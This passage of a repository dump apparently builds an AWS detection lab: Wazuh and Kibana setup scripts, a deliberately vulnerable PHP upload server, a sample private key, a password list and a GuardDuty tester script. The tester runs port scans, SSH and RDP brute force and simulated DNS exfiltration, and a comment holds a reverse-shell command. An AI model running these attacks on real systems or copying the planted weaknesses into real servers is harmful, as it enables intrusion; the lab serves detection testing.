'Content-Type: application/json' -H "Accept: application/json" -d' 406 | { 407 | "api_user": "'${API_USER}'", 408 | "api_password": "'${API_PASS_BASE64}'", 409 | "url": "'${API_URL}'", 410 | "api_port": "'${API_PORT}'", 411 | "insecure" : "true", 412 | "component" : "API", 413 | "cluster_info" : { 414 | "manager" : "'${HOSTNAME}'", 415 | "cluster" : "Disabled", 416 | "status" : "disabled", 417 | "node" : "node01" 418 | }, 419 | "extensions" : { 420 | "audit" : true, 421 | "pci" : true, 422 | "gdpr" : true, 423 | "oscap" : true, 424 | "ciscat" : false, 425 | "aws" : false, 426 | "virustotal" : false 427 | } 428 | } 429 | ' 430 | wait_elastic_component ${ES_QUERY} 431 | } 432 | 433 | configure_kibana() { 434 | # Kibana settings 435 | KIBANA_BASE_URL='localhost:5601' 436 | KIBANA_USER='elastic' 437 | KIBANA_PASSWORD='changeme' 438 | 439 | check_kibana_service_availability="curl -u ${KIBANA_USER}:${KIBANA_PASSWORD} -XGET ${KIBANA_BASE_URL}" 440 | 441 | # Wait until Kibana service is avilable. 442 | wait_elastic_component "${check_kibana_service_availability}" 443 | check_kibana_status="${check_kibana_service_availability} --fail" 444 | wait_elastic_component "${check_kibana_status}" 445 | echo "Kibana is up" 446 | 447 | KIBANA_INDEX_URL="${KIBANA_BASE_URL}/api/kibana/settings/defaultIndex" 448 | 449 | # Set default kibana index to wazuh alerts 450 | curl --fail -X POST -H "Content-Type: application/json" -H "kbn-xsrf: true" -d '{"value":"wazuh-alerts-3.x-*"}' "http://${KIBANA_USER}:${KIBANA_PASSWORD}@${KIBANA_INDEX_URL}" 451 | 452 | # Import AWS Detonation lab dashboards 453 | KIBANA_DASHBOARDS_URL="${KIBANA_BASE_URL}/api/kibana/dashboards/import" 454 | curl -sO https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/master/KibanaAdditionalConfigs/Kibana-Visualizations.json 455 | curl -sO https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/master/KibanaAdditionalConfigs/Kibana-Dashboard.json 456 | curl -X POST -H "Content-Type: application/json" -H "kbn-xsrf: true" "http://${KIBANA_USER}:${KIBANA_PASSWORD}@${KIBANA_DASHBOARDS_URL}" -d @Kibana-Dashboard.json 457 | curl -X POST -H "Content-Type: application/json" -H "kbn-xsrf: true" "http://${KIBANA_USER}:${KIBANA_PASSWORD}@${KIBANA_DASHBOARDS_URL}" -d @Kibana-Visualizations.json 458 | } 459 | 460 | main() { 461 | set_global_parameters 462 | install_dependencies 463 | add_nodejs_repository 464 | add_wazuh_repository 465 | install_wazuh 466 | setup_wazuh_api 467 | add_custom_config 468 | install_java 469 | add_elastic_repository 470 | install_elastic 471 | install_logstash 472 | install_kibana 473 | disable_elastic_repository 474 | configure_wazuh_api 475 | configure_kibana 476 | } 477 | 478 | main 479 | 480 | ####################################### 481 | # next steps is to configure wazuh 482 | ## https://documentation.wazuh.com/current/installation-guide/installing-elastic-stack/connect_wazuh_app.html 483 | -------------------------------------------------------------------------------- /additionalInstallationScripts/installWazuhAgent.ps1: -------------------------------------------------------------------------------- 1 | # Download agent 2 | $url = "https://packages.wazuh.com/3.x/windows/wazuh-agent-3.8.2-1.msi" 3 | $output = "C:\Users\Administrator\Desktop\wazuh-agent-3.8.2-1.msi" 4 | Invoke-WebRequest -Uri $url -OutFile $output 5 | 6 | $wazuh_manager = "172.16.0.21" 7 | 8 | # install agent and register agent 9 | C:\Users\Administrator\Desktop\wazuh-agent-3.8.2-1.msi /q ADDRESS=$wazuh_manager 10 | 11 | $wazuh_path = "C:\Program Files (x86)\ossec-agent" 12 | $agent_auth_path = "$wazuh_path\agent-auth.exe" 13 | 14 | # wait until the wazuh agent is installed, i.e. the ossec-agent directory exists 15 | do { 16 | Write-Output "Wazuh agent is still not installed" 17 | Start-Sleep 10 18 | } while (![System.IO.File]::Exists($agent_auth_path)) 19 | 20 | Write-Output "Wazuh agent is installed" 21 | 22 | $n_retries = 0 # number of times the agent has attempt to register 23 | $max_retries = 5 # maximum number of allowed attemps 24 | 25 | do { 26 | $agent_auth = Start-Process -FilePath $agent_auth_path -ArgumentList "-m $wazuh_manager -A windowsVictim" -WorkingDirectory $wazuh_path -PassThru 27 | Wait-Process -InputObject $agent_auth 28 | $n_retries++ 29 | if ($agent_auth.ExitCode -ne 0) { 30 | Write-Output "Could not register agent. Sleeping for 10 seconds." 31 | Start-Sleep 10 32 | } 33 | } while ($agent_auth.ExitCode -ne 0 -and $n_retries -le $max_retries) 34 | 35 | $final_msg = If ($n_retries -le $max_retries) {"yay!"} Else {"fuck!"} 36 | Write-Output $final_msg 37 | 38 | Restart-Service -Name wazuh -------------------------------------------------------------------------------- /additionalInstallationScripts/installWazuhAgent.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # install wazuh server 3 | # Wazuh documentation - https://documentation.wazuh.com/current/installation-guide/installing-wazuh-agent/wazuh_agent_rpm.html#wazuh-agent-rpm 4 | ####################################### 5 | #sleep timer for if you want this script to run on instance creation. the server takes 5+ minutes to intall. 6 | #sleep 10m 7 | 8 | WAZUH_VERSION=3.8 9 | WAZUH_PATCH=$WAZUH_VERSION.2 10 | WAZUH_PACKAGE=$WAZUH_PATCH-1 11 | 12 | # Adding the Wazuh repository 13 | cat > /etc/yum.repos.d/wazuh.repo <<\EOF 14 | [wazuh_repo] 15 | gpgcheck=1 16 | gpgkey=https://packages.wazuh.com/key/GPG-KEY-WAZUH 17 | enabled=1 18 | name=Wazuh repository 19 | baseurl=https://packages.wazuh.com/3.x/yum/ 20 | protect=1 21 | EOF 22 | 23 | # Installing Wazuh agent 24 | yum install wazuh-agent-$WAZUH_PACKAGE -y -q -e 0 25 | 26 | # register agent 27 | MANAGER_IP="172.16.0.21" 28 | 29 | until /var/ossec/bin/agent-auth -m $MANAGER_IP; do 30 | echo "Wazuh manager is unavailable - sleeping for 5 seconds" 31 | sleep 5 32 | done 33 | 34 | # set up manager ip in the ossec.conf file before restarting 35 | sed -i "s/MANAGER_IP/$MANAGER_IP/" /var/ossec/etc/ossec.conf 36 | 37 | service wazuh-agent restart 38 | 39 | echo "Agent sucessfully registered" 40 | -------------------------------------------------------------------------------- /additionalInstallationScripts/setupVunlerableWebServer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # install apps for attack 4 | sudo yum install ncat -y -q -e 0 5 | sudo yum install nc -y -q -e 0 6 | 7 | # Install Apache 8 | sudo yum install httpd -y -q -e 0 9 | sudo service httpd start 10 | 11 | # Install MySQL 12 | sudo rpm -Uvh http://dev.mysql.com/get/mysql-community-release-el7-5.noarch.rpm 13 | sudo yum install mysql-server -y -q -e 0 14 | sudo service mysqld start 15 | 16 | #sudo /usr/bin/mysql_secure_installation 17 | # 18 | # Automate mysql secure installation for debian-baed systems 19 | # 20 | # - You can set a password for root accounts. 21 | # - You can remove root accounts that are accessible from outside the local host. 22 | # - You can remove anonymous-user accounts. 23 | # - You can remove the test database (which by default can be accessed by all users, even anonymous users), 24 | # and privileges that permit anyone to access databases with names that start with test_. 25 | # For details see documentation: http://dev.mysql.com/doc/refman/5.7/en/mysql-secure-installation.html 26 | # 27 | # @version 13.08.2014 00:39 +03:00 28 | # Tested on Debian 7.6 (wheezy) 29 | # 30 | # Usage: 31 | # Setup mysql root password: ./mysql_secure.sh 'your_new_root_password' 32 | # Change mysql root password: ./mysql_secure.sh 'your_old_root_password' 'your_new_root_password'" 33 | # 34 | 35 | # Delete package expect when script is done 36 | # 0 - No; 37 | # 1 - Yes. 38 | PURGE_EXPECT_WHEN_DONE=0 39 | 40 | # 41 | # Check the bash shell script is being run by root 42 | # 43 | # if [[ $EUID -ne 0 ]]; then 44 | # echo "This script must be run as root" 1>&2 45 | # exit 1 46 | # fi 47 | 48 | # 49 | # Check input params 50 | # 51 | # if [ -n "${1}" -a -z "${2}" ]; then 52 | # # Setup root password 53 | # CURRENT_MYSQL_PASSWORD='' 54 | # NEW_MYSQL_PASSWORD="${1}" 55 | # elif [ -n "${1}" -a -n "${2}" ]; then 56 | # # Change existens root password 57 | # CURRENT_MYSQL_PASSWORD="${1}" 58 | # NEW_MYSQL_PASSWORD="${2}" 59 | # else 60 | # echo "Usage:" 61 | # echo " Setup mysql root password: ${0} 'your_new_root_password'" 62 | # echo " Change mysql root password: ${0} 'your_old_root_password' 'your_new_root_password'" 63 | # exit 1 64 | # fi 65 | 66 | 67 | # Setup root password 68 | CURRENT_MYSQL_PASSWORD='' 69 | NEW_MYSQL_PASSWORD="master" 70 | 71 | # 72 | # Check is expect package installed 73 | # 74 | if [ $(dpkg-query -W -f='${Status}' expect 2>/dev/null | grep -c "ok installed") -eq 0 ]; then 75 | echo "Can't find expect. Trying install it..." 76 | yum -y install expect -y -q -e 0 77 | 78 | fi 79 | 80 | SECURE_MYSQL=$(expect -c " 81 | set timeout 3 82 | spawn mysql_secure_installation 83 | expect \"Enter current password for root (enter for none):\" 84 | send \"$CURRENT_MYSQL_PASSWORD\r\" 85 | expect \"root password?\" 86 | send \"y\r\" 87 | expect \"New password:\" 88 | send \"$NEW_MYSQL_PASSWORD\r\" 89 | expect \"Re-enter new password:\" 90 | send \"$NEW_MYSQL_PASSWORD\r\" 91 | expect \"Remove anonymous users?\" 92 | send \"y\r\" 93 | expect \"Disallow root login remotely?\" 94 | send \"y\r\" 95 | expect \"Remove test database and access to it?\" 96 | send \"y\r\" 97 | expect \"Reload privilege tables now?\" 98 | send \"y\r\" 99 | expect eof 100 | ") 101 | 102 | # 103 | # Execution mysql_secure_installation 104 | # 105 | # echo "${SECURE_MYSQL}" 106 | # 107 | # if [ "${PURGE_EXPECT_WHEN_DONE}" -eq 1 ]; then 108 | # # Uninstalling expect package 109 | # yum -y purge expect -y -q -e 0 110 | # fi 111 | 112 | 113 | # Install PHP 114 | sudo yum install php php-mysql -y -q -e 0 115 | sudo yum install php-* -y -q -e 0 116 | 117 | # set services to start on boot 118 | sudo chkconfig httpd on 119 | sudo chkconfig mysqld on 120 | 121 | # setup first php page 122 | cat > /var/www/html/info.php <<\EOF 123 | 126 | EOF 127 | 128 | #make vulnerable php index 129 | cat > /var/www/html/index.php <<\EOF 130 | 138 | EOF 139 | 140 | #make html file upload page 141 | cat > /var/www/html/index.html <<\EOF 142 | 143 | 144 | 145 | 146 |
147 | Select image to upload: 148 | 149 | 150 |
151 | 152 | 153 | 154 | EOF 155 | 156 | #make file upload php 157 | cat > /var/www/html/upload.php <<\EOF 158 | 500000) { 181 | echo "Sorry, your file is too large."; 182 | $uploadOk = 0; 183 | } 184 | // Allow certain file formats 185 | if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg" 186 | && $imageFileType != "gif" ) { 187 | echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed."; 188 | $uploadOk = 0; 189 | } 190 | // Check if $uploadOk is set to 0 by an error 191 | if ($uploadOk == 0) { 192 | echo "Sorry, your file was not uploaded."; 193 | // if everything is ok, try to upload file 194 | } else { 195 | if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { 196 | echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded."; 197 | } else { 198 | echo "Sorry, there was an error uploading your file."; 199 | } 200 | } 201 | ?> 202 | EOF 203 | 204 | #make upload directory 205 | mkdir -p /var/www/html/uploads 206 | 207 | #add apache to wheel because we want bad things to happen 208 | usermod -aG wheel apache 209 | 210 | # restart web service 211 | sudo service httpd restart -------------------------------------------------------------------------------- /artifacts/banner_message.txt: -------------------------------------------------------------------------------- 1 | 2 | ############################################################################### 3 | # ____ _ _ # 4 | # | __ ) __ _ ___| |_(_) ___ _ __ # 5 | # | _ \ / _` / __| __| |/ _ \| '_ \ # 6 | # | |_) | (_| \__ \ |_| | (_) | | | | # 7 | # |____/ \__,_|___/\__|_|\___/|_| |_| # 8 | #-----------------------------------------------------------------------------# 9 | # Authorized access only! # 10 | # Disconnect IMMEDIATELY if you are not an authorized user!!! # 11 | # All actions will be monitored and recorded. # 12 | ############################################################################### 13 | -------------------------------------------------------------------------------- /artifacts/never_used_sample_key.foo: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIIEowIBAAKCAQEAhXi8JHSHWcETzpLkOYvgycYkgNnvEhRe+IUJ2VyAMwOrvOdu0UbTrMtk9GjY 3 | 7K/RsADsugvdunWBDBm5gT2GG5PgEbrj45ae0nzT6kHgSZcVJ98KQHBOCXPYIo+hHA5aicRG9khb 4 | xqrXo0rJkv9PFl/guNdUdDAp9vRY9KAylGoVC1TgZGpC8q3nyZt/3WK99puI2EdOEOY0E6mO+4tc 5 | tlKe5wCxkGzhndUezPvIxW3rilja0OZbvZ6xj0rWKGJguUm1ODjO/hGOUsbcQpQ1RMrNdXtrnnsQ 6 | ttHP5KHC+BrQhDKePtuVpqeu/pqqLXsH7xHf7tN71PaLzmXDfJ8YiwIDAQABAoIBADGrlbCnYPto 7 | 2/sjNSWpRXUxdMIy2EJNLG6l691lDBxwAEhjhB0Dk6CZbK98GUYzxAAQyAgQhGpwch7Tr/JFuBOp 8 | O1i9yTMYCXDhnWdvLo2UWP4mhcUnRhNEdimec+FiAhWE4reig+zyBR+ypEM9GeyEr7d6AubeSa+q 9 | jTQ0Lb6HFhjXY+ZycmJcYAgpuO1kaftjnSzETZB0aFJZqy+VpEGMdRxy+3sErXu3W17GFvpx+8KP 10 | 6aocjkm+9LCPQmsQ8KJRzzrT8Tr74/lYjBPhkqUnTUfb/tWUY3fJ55uYZjgjhS8Fc3yfbdZevCqG 11 | KFoxJR7SoSuRSz+yGF4nSg0PTtECgYEAwvwsfpeHiuhcJsbnahVEZ9Ky26KG+49MHJChqkS9UDEh 12 | WmG8VI08XnZk6i4cxexlkTjy+8npF3omssm/zJhEGMrXK3Erll0ykiweSa04LFe8/BC2RUGgHqLY 13 | yEdJAurH26GXXsFRm8zeyfA3C3Kzla73g4sN4jp3Rr0Y9hx4dXMCgYEArzzaw0s6kPFXElJSf3L6 14 | PtcMCJQMD9MGGoGCSbLWyKBvGIfTxIovDEwy56Xrg92WqaUh2ez8shXr9NN2STM1rk/ZwV76CG3Y 15 | mn/PgqJ73YaTrPq94QQ9vQ7jdzgTdurC/kNuKPl7ogSQB4YsFYv1lfW/hiHkCAmkL3k9hGO3SokC 16 | gYEAg0DlYsH2B9eqUKAMHyj5xznaFGcvnh80CPaDHO7w0Q6BeSnZcMEyJhRkkg9AZyteo4dGaZ/d 17 | PGSJsEiGx96n2FiSxzeDM9DAvgzcxpPIAHF/Ud6eE7i9ZGISs57o0wHgT0RTdQGFQe+C+USuiRJJ 18 | OTVygCYWzna02/Vm3CUGIWkCgYAey4XyPf0rzY2spZTj2tPJSUdPFp1MBpyS+eFojCoclb0QRYZc 19 | iqAb/CQR+2F5Ce7ZHzDkuDXsIdgWbTbjREGRwWyWA9fStWMUO5O+9EjqNCUth97odTNYTw6AO/WH 20 | t1fPERCB2N32KfEZsWV7392nnckrjDcjhnY49YhvBIsIaQKBgE5w2DBPEF3MaZdmmcXqb6UBJXy6 21 | F4hNFhlGr3Y11f7u6rY3sYl6EkvLDPPg8CUKgtEPCKwoACCVHdtTZ42RXRVgzwhY3kRNQM1WneKM 22 | W1rsM0jS6Ayo+dLs0U7LhdRcEKPHsw9bJau3Nr5mm+sjC791nj4wUEctYWFuh0idgTk7 23 | -----END RSA PRIVATE KEY----- -------------------------------------------------------------------------------- /artifacts/password_list.txt: -------------------------------------------------------------------------------- 1 | 123456 2 | password 3 | 12345678 4 | 1234 5 | 12345 6 | dragon 7 | qwerty 8 | 696969 9 | mustang 10 | letmein 11 | baseball 12 | master 13 | michael 14 | football 15 | shadow 16 | monkey 17 | abc123 18 | pass 19 | 6969 20 | jordan 21 | harley 22 | ranger 23 | iwantu 24 | jennifer 25 | hunter 26 | 2000 27 | test 28 | batman 29 | trustno1 30 | thomas 31 | tigger 32 | robert 33 | access 34 | love 35 | buster 36 | 1234567 37 | soccer 38 | hockey 39 | killer 40 | george 41 | sexy 42 | andrew 43 | charlie 44 | superman 45 | dallas 46 | jessica 47 | pepper 48 | 1111 49 | austin 50 | william 51 | daniel 52 | golfer 53 | summer 54 | heather 55 | hammer 56 | yankees 57 | joshua 58 | maggie 59 | biteme 60 | enter 61 | ashley 62 | thunder 63 | cowboy 64 | silver 65 | richard 66 | orange 67 | merlin 68 | michelle 69 | corvette 70 | bigdog 71 | cheese 72 | matthew 73 | 121212 74 | patrick 75 | martin 76 | freedom 77 | ginger 78 | nicole 79 | sparky 80 | yellow 81 | camaro 82 | secret 83 | falcon 84 | taylor 85 | 111111 86 | 131313 87 | 123123 88 | hello 89 | scooter 90 | please 91 | porsche 92 | guitar 93 | chelsea 94 | black 95 | diamond 96 | nascar 97 | jackson 98 | cameron 99 | 654321 100 | computer 101 | amanda 102 | wizard 103 | xxxxxxxx 104 | money 105 | phoenix 106 | mickey 107 | bailey 108 | knight 109 | iceman 110 | tigers 111 | purple 112 | andrea 113 | dakota 114 | aaaaaa 115 | player 116 | sunshine 117 | morgan 118 | starwars 119 | boomer 120 | cowboys 121 | edward 122 | charles 123 | girls 124 | booboo 125 | coffee 126 | xxxxxx 127 | bulldog 128 | ncc1701 129 | rabbit 130 | peanut 131 | john 132 | johnny 133 | gandalf 134 | spanky 135 | winter 136 | brandy 137 | compaq 138 | carlos 139 | tennis 140 | james 141 | mike 142 | brandon 143 | fender 144 | anthony 145 | ferrari 146 | cookie 147 | chicken 148 | maverick 149 | chicago 150 | joseph 151 | diablo 152 | 666666 153 | willie 154 | welcome 155 | chris 156 | panther 157 | yamaha 158 | justin 159 | banana 160 | driver 161 | marine 162 | angels 163 | fishing 164 | david 165 | maddog 166 | hooters 167 | wilson 168 | butthead 169 | dennis 170 | captain 171 | chester 172 | smokey 173 | xavier 174 | steven 175 | viking 176 | snoopy 177 | blue 178 | eagles 179 | winner 180 | samantha 181 | house 182 | miller 183 | flower 184 | jack 185 | firebird 186 | butter 187 | united 188 | turtle 189 | steelers 190 | tiffany 191 | zxcvbn 192 | tomcat 193 | golf 194 | bond007 195 | bear 196 | tiger 197 | doctor 198 | gateway 199 | gators 200 | angel 201 | junior 202 | thx1138 203 | badboy 204 | debbie 205 | spider 206 | melissa 207 | booger 208 | 1212 209 | flyers 210 | fish 211 | matrix 212 | teens 213 | scooby 214 | jason 215 | walter 216 | boston 217 | braves 218 | yankee 219 | lover 220 | barney 221 | victor 222 | tucker 223 | princess 224 | mercedes 225 | 5150 226 | doggie 227 | zzzzzz 228 | gunner 229 | horney 230 | bubba 231 | 2112 232 | fred 233 | johnson 234 | xxxxx 235 | member 236 | donald 237 | jackie 238 | monica 239 | midnight 240 | college 241 | baby 242 | brian 243 | mark 244 | startrek 245 | sierra 246 | leather 247 | 232323 248 | 4444 249 | beavis 250 | happy 251 | sophie 252 | ladies 253 | naughty 254 | giants 255 | blonde 256 | golden 257 | dolphins 258 | -------------------------------------------------------------------------------- /attacks/README.md: -------------------------------------------------------------------------------- 1 | place holder 2 | -------------------------------------------------------------------------------- /attacks/guardduty_tester.sh: -------------------------------------------------------------------------------- 1 | #Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved. 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"). 4 | # You may not use this file except in compliance with the License. 5 | # A copy of the License is located at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # or in the "license" file accompanying this file. This file is distributed 10 | # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either 11 | # express or implied. See the License for the specific language governing 12 | # permissions and limitations under the License. 13 | # originally from https://raw.githubusercontent.com/awslabs/amazon-guardduty-tester/master/guardduty_tester.sh 14 | 15 | #!/bin/bash 16 | 17 | # load IP addresses created by templates 18 | source localIps.sh 19 | 20 | # simulate external recon 21 | #echo 'External port probe on a temporarily unprotected port' 22 | 23 | # 1 - simulate internal recon and attempted lateral movement 24 | echo 25 | echo '***********************************************************************' 26 | echo '* Test #1 - Internal port scanning *' 27 | echo '* This simulates internal reconaissance by an internal actor or an *' 28 | echo '* external actor after an initial compromise. This is considered a *' 29 | echo '* low priority finding for GuardDuty because its not a clear indicator*' 30 | echo '* of malicious intent on its own. *' 31 | echo '***********************************************************************' 32 | echo 33 | sudo nmap -sT $BASIC_LINUX_TARGET 34 | echo 35 | echo '-----------------------------------------------------------------------' 36 | echo 37 | # 2 - ssh brute force with list of keys found on web 38 | echo '***********************************************************************' 39 | echo '* Test #2 - SSH Brute Force with Compromised Keys *' 40 | echo '* This simulates an SSH brute force attack on an SSH port that we *' 41 | echo '* can access from this instance. It uses (phony) compromised keys in *' 42 | echo '* many subsequent attempts to see if one works. This is a common *' 43 | echo '* techique where the bad actors will harvest keys from the web in *' 44 | echo '* places like source code repositories where people accidentally leave*' 45 | echo '* keys and credentials (This attempt will not actually succeed in *' 46 | echo '* obtaining access to the target linux instance in this subnet) *' 47 | echo '***********************************************************************' 48 | echo 49 | for j in `seq 1 10`; 50 | do 51 | sudo ./crowbar/crowbar.py -b sshkey -s $BASIC_LINUX_TARGET/32 -u ec2-user -k ./compromised_keys; 52 | done 53 | echo 54 | echo '-----------------------------------------------------------------------' 55 | echo 56 | # 3 - rdp brute force with known user and list of passwords found on web 57 | echo '***********************************************************************' 58 | echo '* Test #3 - RDP Brute Force with Password List *' 59 | echo '* This simulates an RDP brute force attack on the internal RDP port *' 60 | echo '* of the windows server that we installed in the environment. It uses*' 61 | echo '* a list of common passwords that can be found on the web. This test *' 62 | echo '* will trigger a detection, but will fail to get into the target *' 63 | echo '* windows instance. *' 64 | echo '***********************************************************************' 65 | echo 66 | echo 'Sending 250 password attempts at the windows server...' 67 | hydra -t 4 -f -l administrator -P ./passwords/password_list.txt rdp://$BASIC_WINDOWS_TARGET 68 | echo 69 | echo '-----------------------------------------------------------------------' 70 | echo 71 | # 4 - CryptoCurrency Activity 72 | echo '***********************************************************************' 73 | echo '* Test #4 - CryptoCurrency Mining Activity *' 74 | echo '* This simulates interaction with a cryptocurrency mining pool which *' 75 | echo '* can be an indication of an instance compromise. In this case, we are*' 76 | echo '* only interacting with the URL of the pool, but not downloading *' 77 | echo '* any files. This will trigger a threat intel based detection. *' 78 | echo '***********************************************************************' 79 | echo 80 | echo "Calling bitcoin wallets to download mining toolkits" 81 | curl -s http://com.minergate.pool/dkjdjkjdlsajdkljalsskajdksakjdksajkllalkdjsalkjdsalkjdlkasj > /dev/null & 82 | curl -s http://xdn-xmr.pool.minergate.com/dhdhjkhdjkhdjkhajkhdjskahhjkhjkahdsjkakjasdhkjahdjk > /dev/null & 83 | echo 84 | echo '-----------------------------------------------------------------------' 85 | echo 86 | # 5 - DNS Exfiltation 87 | echo '***********************************************************************' 88 | echo '* Test #5 - DNS Exfiltration *' 89 | echo '* A common exfiltration technique is to tunnel data out over DNS *' 90 | echo '* to a fake domain. Its an effective technique because most hosts *' 91 | echo '* have outbound DNS ports open. This test wont exfiltrate any data, *' 92 | echo '* but it will generate enough unusual DNS activity to trigger the *' 93 | echo '* detection. *' 94 | echo '***********************************************************************' 95 | echo 96 | echo "Calling large numbers of large domains to simulate tunneling via DNS" 97 | dig -f ./domains/queries.txt > /dev/null & 98 | echo 99 | # 6 - Backdoor:EC2/C&CActivity.B!DNS 100 | echo '***********************************************************************' 101 | echo '* Test #6 - Fake domain to prove that GuardDuty is working *' 102 | echo '* This is a permanent fake domain that customers can use to prove that*' 103 | echo '* GuardDuty is working. Calling this domain will always generate the *' 104 | echo '* Backdoor:EC2/C&CActivity.B!DNS finding type *' 105 | echo '***********************************************************************' 106 | echo 107 | echo "Calling a well known fake domain that is used to generate a known finding" 108 | dig GuardDutyC2ActivityB.com any 109 | echo 110 | echo '***********************************************************************' 111 | echo '* Test #7 - scan webserver for vulnerabilities *' 112 | echo '* This will be used to find a vulnerable server for php attack *' 113 | echo '***********************************************************************' 114 | echo 115 | #echo "scan webserver for vulnerabilities" 116 | #nikto -h $BASIC_LINUX_TARGET 117 | # ncat -v -n -l -p 6666 & 118 | # curl http://54.210.117.54/index.php?cmd=ncat%20$BASIC_LINUX_TARGET%206666%20-e%20/bin/bash 119 | echo '*****************************************************************************************************' 120 | echo 'Expected GuardDuty Findings' 121 | echo 122 | echo 'Test 1: Internal Port Scanning' 123 | echo 'Expected Finding: EC2 Instance ' $RED_TEAM_INSTANCE ' is performing outbound port scans against remote host.' $BASIC_LINUX_TARGET 124 | echo 'Finding Type: Recon:EC2/Portscan' 125 | echo 126 | echo 'Test 2: SSH Brute Force with Compromised Keys' 127 | echo 'Expecting two findings - one for the outbound and one for the inbound detection' 128 | echo 'Outbound: ' $RED_TEAM_INSTANCE ' is performing SSH brute force attacks against ' $BASIC_LINUX_TARGET 129 | echo 'Inbound: ' $RED_TEAM_IP ' is performing SSH brute force attacks against ' $BASIC_LINUX_INSTANCE 130 | echo 'Finding Type: UnauthorizedAccess:EC2/SSHBruteForce' 131 | echo 132 | echo 'Test 3: RDP Brute Force with Password List' 133 | echo 'Expecting two findings - one for the outbound and one for the inbound detection' 134 | echo 'Outbound: ' $RED_TEAM_INSTANCE ' is performing RDP brute force attacks against ' $BASIC_WINDOWS_TARGET 135 | echo 'Inbound: ' $RED_TEAM_IP ' is performing RDP brute force attacks against ' $BASIC_WINDOWS_INSTANCE 136 | echo 'Finding Type : UnauthorizedAccess:EC2/RDPBruteForce' 137 | echo 138 | echo 'Test 4: Cryptocurrency Activity' 139 | echo 'Expected Finding: EC2 Instance ' $RED_TEAM_INSTANCE ' is querying a domain name that is associated with bitcoin activity' 140 | echo 'Finding Type : CryptoCurrency:EC2/BitcoinTool.B!DNS' 141 | echo 142 | echo 'Test 5: DNS Exfiltration' 143 | echo 'Expected Finding: EC2 instance ' $RED_TEAM_INSTANCE ' is attempting to query domain names that resemble exfiltrated data' 144 | echo 'Finding Type : Backdoor:EC2/DNSDataExfiltration' 145 | echo 146 | echo 'Test 6: C&C Activity' 147 | echo 'Expected Finding: EC2 instance ' $RED_TEAM_INSTANCE ' is querying a domain name associated with a known Command & Control server. ' 148 | echo 'Finding Type : Backdoor:EC2/C&CActivity.B!DNS' 149 | echo 150 | -------------------------------------------------------------------------------- /images/RoyalTSX-Config/1-RoyalTSX-requiredDocument.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/RoyalTSX-Config/1-RoyalTSX-requiredDocument.png -------------------------------------------------------------------------------- /images/RoyalTSX-Config/2-RDP-connnectionSettings.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/RoyalTSX-Config/2-RDP-connnectionSettings.png -------------------------------------------------------------------------------- /images/RoyalTSX-Config/3-RDP-credentials.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/RoyalTSX-Config/3-RDP-credentials.png -------------------------------------------------------------------------------- /images/RoyalTSX-Config/4-RDP-secureGateway.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/RoyalTSX-Config/4-RDP-secureGateway.png -------------------------------------------------------------------------------- /images/RoyalTSX-Config/5-bastion- credential.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/RoyalTSX-Config/5-bastion- credential.png -------------------------------------------------------------------------------- /images/RoyalTSX-Config/6-bastion-key.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/RoyalTSX-Config/6-bastion-key.png -------------------------------------------------------------------------------- /images/RoyalTSX-Config/7-secureGateway-config.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/RoyalTSX-Config/7-secureGateway-config.png -------------------------------------------------------------------------------- /images/RoyalTSX-Config/8-secureGateway-credentials.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/RoyalTSX-Config/8-secureGateway-credentials.png -------------------------------------------------------------------------------- /images/Topology/Topology-All.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/Topology/Topology-All.png -------------------------------------------------------------------------------- /images/Topology/Topology-IAM.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/Topology/Topology-IAM.png -------------------------------------------------------------------------------- /images/Topology/Topology-Inspector.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/Topology/Topology-Inspector.png -------------------------------------------------------------------------------- /images/Topology/Topology-cloudTrail.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/Topology/Topology-cloudTrail.png -------------------------------------------------------------------------------- /images/Topology/Topology-guardduty.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/Topology/Topology-guardduty.png -------------------------------------------------------------------------------- /images/Topology/Topology-macie.png: 